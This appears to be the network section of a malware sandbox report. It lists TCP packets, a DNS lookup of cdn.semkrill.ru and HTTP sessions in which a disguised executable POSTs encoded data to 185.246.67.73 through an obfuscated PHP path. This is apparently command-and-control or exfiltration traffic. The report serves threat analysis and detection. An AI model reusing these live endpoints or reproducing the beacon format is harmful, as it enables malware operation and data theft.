                                                                                                                      Dec 8, 2024 15:28:39.642287016 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.642456055 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.642549992 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.642569065 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.642600060 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.642957926 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.642999887 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.761928082 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.997936964 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:40.117453098 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:40.117484093 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:40.117516994 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:40.965383053 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.013252974 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.200793028 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.247618914 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.321918964 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.444087982 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.444246054 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.444286108 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.563534021 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.794598103 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.914486885 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.914499044 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.914568901 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:42.768253088 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:42.825757980 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.000971079 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:43.044496059 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.117382050 CET4990980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.117474079 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.117973089 CET4975680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.118045092 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.118083000 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.236788988 CET8049909185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:43.236876011 CET4990980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.237008095 CET4990980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.237240076 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:43.237318039 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.356597900 CET8049909185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:43.591629028 CET4990980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:43.711812973 CET8049909185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:43.711855888 CET8049909185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:43.711889982 CET8049909185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.279783964 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.280011892 CET4990980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.399425030 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.401606083 CET8049915185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.401688099 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.401787043 CET8049909185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.401792049 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.401835918 CET4990980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.523757935 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.525891066 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.525981903 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.526267052 CET8049915185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.650157928 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.747765064 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.867753983 CET8049915185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.868140936 CET8049915185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.872741938 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:44.992198944 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.992208004 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:44.992217064 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:45.723938942 CET8049915185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:45.763226032 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:45.853246927 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:45.903835058 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:45.957278013 CET8049915185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:45.997595072 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.088808060 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:46.138216019 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.211612940 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.211615086 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.211918116 CET4992280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.331346035 CET8049915185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:46.331382036 CET8049922185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:46.331425905 CET4991580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.331476927 CET4992280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.331614017 CET4992280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.331758022 CET8049916185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:46.331806898 CET4991680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.451025963 CET8049922185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:46.685286045 CET4992280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:46.806309938 CET8049922185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:46.806323051 CET8049922185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:46.806338072 CET8049922185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:47.665875912 CET8049922185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:47.716322899 CET4992280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:47.896572113 CET8049922185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:47.950701952 CET4992280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:48.009186029 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:48.128547907 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:48.130388021 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:48.130521059 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:48.250027895 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:48.482836962 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:48.604191065 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:48.604211092 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:48.604222059 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:49.560025930 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:49.606928110 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:49.690546989 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:49.731929064 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:49.805232048 CET4992280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:49.805641890 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:49.805911064 CET4993080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:49.925431013 CET8049930185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:49.925488949 CET4993080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:49.925580025 CET4993080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:49.925690889 CET8049927185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:49.926325083 CET4992780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:50.044800997 CET8049930185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:50.278917074 CET4993080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:50.398341894 CET8049930185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:50.398392916 CET8049930185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:50.398442984 CET8049930185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:50.967353106 CET4993080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:50.967443943 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.087217093 CET8049934185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.087342024 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.087480068 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.087642908 CET8049930185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.087734938 CET4993080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.088885069 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.206741095 CET8049934185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.208555937 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.210338116 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.210522890 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.329874039 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.438301086 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.557612896 CET8049934185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.557697058 CET8049934185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.560235977 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:51.679563999 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.679584980 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:51.679641008 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:52.407707930 CET8049934185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:52.450634003 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:52.535586119 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:52.591262102 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:52.644364119 CET8049934185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:52.685028076 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:52.768261909 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:52.810023069 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:52.885637999 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:52.885880947 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:52.886037111 CET4994180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:53.009135962 CET8049934185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:53.009258032 CET8049941185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:53.009443998 CET4993480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:53.009443998 CET4994180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:53.009546995 CET4994180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:53.009706974 CET8049936185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:53.013540983 CET4993680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:53.129576921 CET8049941185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:53.356987000 CET4994180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:53.476907969 CET8049941185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:53.476918936 CET8049941185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:53.476928949 CET8049941185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:54.329621077 CET8049941185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:54.372503996 CET4994180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:54.568438053 CET8049941185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:54.622499943 CET4994180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:54.682605982 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:54.802436113 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:54.802495956 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:54.802606106 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:54.921871901 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:55.154283047 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:55.273700953 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:55.273720980 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:55.273802042 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:56.121335983 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:56.169348955 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.356427908 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:56.403724909 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.480048895 CET4994180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.480700016 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.480950117 CET4995180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.601083994 CET8049951185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:56.601130009 CET4995180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.601273060 CET4995180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.601295948 CET8049947185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:56.601341963 CET4994780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:56.720900059 CET8049951185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:56.950685024 CET4995180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.070235014 CET8049951185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:57.070286036 CET8049951185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:57.070302963 CET8049951185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:57.662230015 CET4995580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.662924051 CET4995180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.781713009 CET8049955185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:57.782341957 CET4995580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.782521009 CET8049951185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:57.782557011 CET4995580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.782638073 CET4995180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.822222948 CET4995680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.902354002 CET8049955185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:57.941570997 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:57.941658020 CET4995680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:57.941849947 CET4995680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:58.065922022 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:58.138880968 CET4995580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:58.258661032 CET8049955185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:58.258699894 CET8049955185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:58.294572115 CET4995680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:58.414060116 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:58.414103985 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:58.414203882 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:59.171087027 CET8049955185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:59.217011929 CET4995580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:59.336906910 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:59.390208006 CET4995680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:59.404311895 CET8049955185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:59.450692892 CET4995580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:59.576364994 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:59.622447014 CET4995680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:29:04.302771091 CET8049955185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:29:04.302824974 CET4995580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:29:04.346678972 CET8049956185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:29:04.347377062 CET4995680192.168.2.4185.246.67.73

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 8, 2024 15:26:57.102055073 CET5658253192.168.2.41.1.1.1
                                                                                                                      Dec 8, 2024 15:26:57.532289982 CET53565821.1.1.1192.168.2.4

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 8, 2024 15:26:57.102055073 CET192.168.2.41.1.1.10xa88Standard query (0)cdn.semkrill.ruA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 8, 2024 15:26:57.532289982 CET1.1.1.1192.168.2.40xa88No error (0)cdn.semkrill.ru172.67.184.109A (IP address)IN (0x0001)false
                                                                                                                      Dec 8, 2024 15:26:57.532289982 CET1.1.1.1192.168.2.40xa88No error (0)cdn.semkrill.ru104.21.19.10A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • cdn.semkrill.ru
                                                                                                                      • 185.246.67.73

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449743185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:21.862191916 CET561OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 344
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:22.217119932 CET344OUTData Raw: 05 00 04 05 03 0c 04 02 05 06 02 01 02 04 01 05 00 0b 05 01 02 01 03 0a 07 0e 0d 0d 03 06 01 08 0f 52 05 01 03 03 03 0a 0e 05 04 05 04 0b 04 02 06 06 0e 0f 0c 06 07 00 01 06 03 00 06 01 00 08 01 05 0f 5b 04 07 01 08 0f 00 0b 04 0e 00 0e 06 05 07
                                                                                                                      Data Ascii: R[\Q\L~hfOwbyuuoQlbYwols]XolR[z`u^hnt`Ys[}e~V@@{SP~by
                                                                                                                      Dec 8, 2024 15:27:23.198961020 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:23.315932989 CET1236INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:22 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 1364
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 56 4a 7e 01 6f 53 51 4a 6c 62 74 48 6b 71 55 44 69 77 67 4f 7c 06 69 0d 7a 73 74 05 7d 72 74 4b 77 60 69 09 7a 4f 71 4a 62 76 60 03 69 61 78 01 55 4b 71 0c 74 72 5a 58 68 71 7e 58 7f 5e 61 55 6f 48 63 54 69 60 77 00 61 5c 61 4e 77 5f 5b 03 7e 72 69 5c 69 0a 78 09 7d 77 78 5e 75 4c 7b 06 7c 5b 71 05 7e 5e 72 5a 78 77 55 58 6f 59 6c 04 6f 53 55 00 6e 5b 6c 48 6c 05 6e 4f 7c 73 7c 4a 7b 74 7c 06 6a 62 77 06 62 5f 63 59 7a 51 41 5b 7f 5e 68 0a 6b 4f 75 43 75 52 68 4c 7a 6c 7b 5b 77 4e 62 0a 7a 4f 65 00 7e 7c 69 5a 6c 61 62 48 75 05 78 5b 75 72 6c 4c 63 58 62 50 7e 5d 7a 06 74 72 6d 01 76 65 5e 09 7f 7c 65 05 77 6f 60 04 7f 5d 6f 5b 78 6f 63 03 6c 06 76 01 7c 6d 6b 51 77 5e 7c 03 7e 62 62 09 69 54 67 42 78 0b 7a 4f 7e 4c 71 40 7b 5d 46 51 68 7c 7c 4e 7e 4e 70 0a 7d 01 7d 5d 78 7d 68 5b 7b 72 52 05 7f 4f 6b 4a 7e 74 63 0a 7c 70 61 42 79 5d 70 07 7e 5b 6f 5d 60 4d 5b 51 7b 5c 79 44 76 48 5a 4a 7e 48 56 07 7e 76 7d 0c 74 5c 55 00 7f 4c 57 01 7c 49 58 09 78 48 74 4f 7e 5d 51 02 76 5c 79 03 74 5f 5f 48 7c 4f [TRUNCATED]
                                                                                                                      Data Ascii: VJ~oSQJlbtHkqUDiwgO|izst}rtKw`izOqJbv`iaxUKqtrZXhq~X^aUoHcTi`wa\aNw_[~ri\ix}wx^uL{|[q~^rZxwUXoYloSUn[lHlnO|s|J{t|jbwb_cYzQA[^hkOuCuRhLzl{[wNbzOe~|iZlabHux[urlLcXbP~]ztrmve^|ewo`]o[xoclv|mkQw^|~bbiTgBxzO~Lq@{]FQh||N~Np}}]x}h[{rROkJ~tc|paBy]p~[o]`M[Q{\yDvHZJ~HV~v}t\ULW|IXxHtO~]Qv\yt__H|OfI~ld~wwvOkxry|pmIxIx{Ylxmxr^zc\|^|ywVJ}rwwqV}lo|YRaaNwlpLz|tt`vNyOy~|PN{_zuMUDv_ptab`Ttbmvu|O|RitBpcZIxlUEz`z}}|wwZ}Lz@|}{zmnO~\y}pVA||pA~`p}wT{}QxL`I~q{|g{A`}Ays^b^Ftc[ya}JvH`H}vh}fqtLU|riwfN{HhA~MUJuriw_aIqb~lRA}Y{Ivq{I{ruG~pa{g|C{Yxy}wzrRF{]PN{]NZxId|agOurliUgKYd@}quwl`xBYXwNPnb}jBP_z\y\}b`g{ZL~JxY}^cqn_asPR}tlYZ|DylRXxNP|C^w^pizzSYQgaeZS[_PscQVoMSsAjk}|PEZxrg\|Xk~wU~suy`p~alccSn_\^afd}X{_~f}QvXAZhfCQtKlUMkx\[nnZZiY~\z|Rd|YwJuLIx\_Ywr]ldCT{o[WnWnYPd~{__RJwiQ|Eq\BYi`DQtIhXL`sZo]G[]~}^\WAqlWyCq^AZbc@ZrOk_BarYbUNSS~Ccl\~^s|akA|YW_P{J]d]FRZAinRHW
                                                                                                                      Dec 8, 2024 15:27:23.316003084 CET357INData Raw: 79 69 61 01 5b 7b 5e 5e 51 66 55 6f 0a 79 72 5d 4e 50 5e 44 5d 79 7a 78 5d 6c 61 08 46 53 7d 64 5d 52 64 03 5e 68 06 09 09 56 59 6b 4c 55 63 7b 47 63 70 65 51 7b 5c 7a 65 6d 4b 78 41 7a 5f 55 5b 52 01 7a 4b 5d 61 56 43 50 5a 09 5f 50 00 65 4c 52
                                                                                                                      Data Ascii: yia[{^^QfUoyr]NP^D]yzx]laFS}d]Rd^hVYkLUc{GcpeQ{\zemKxAz_U[RzK]aVCPZ_PeLRzsgZtDbeqpYnEPma]j{wmTttbmYyur^icDT{oZWdSoDSqYDo`cXl`|z]uq\BYi`DQtIhXL`w@WVcA[YaLPpXQof_z\y~Z|Yvwt[ba@Pc}_p_O\boNRHcU@iA[RZQca_{SVPww
                                                                                                                      Dec 8, 2024 15:27:23.353552103 CET537OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 384
                                                                                                                      Expect: 100-continue
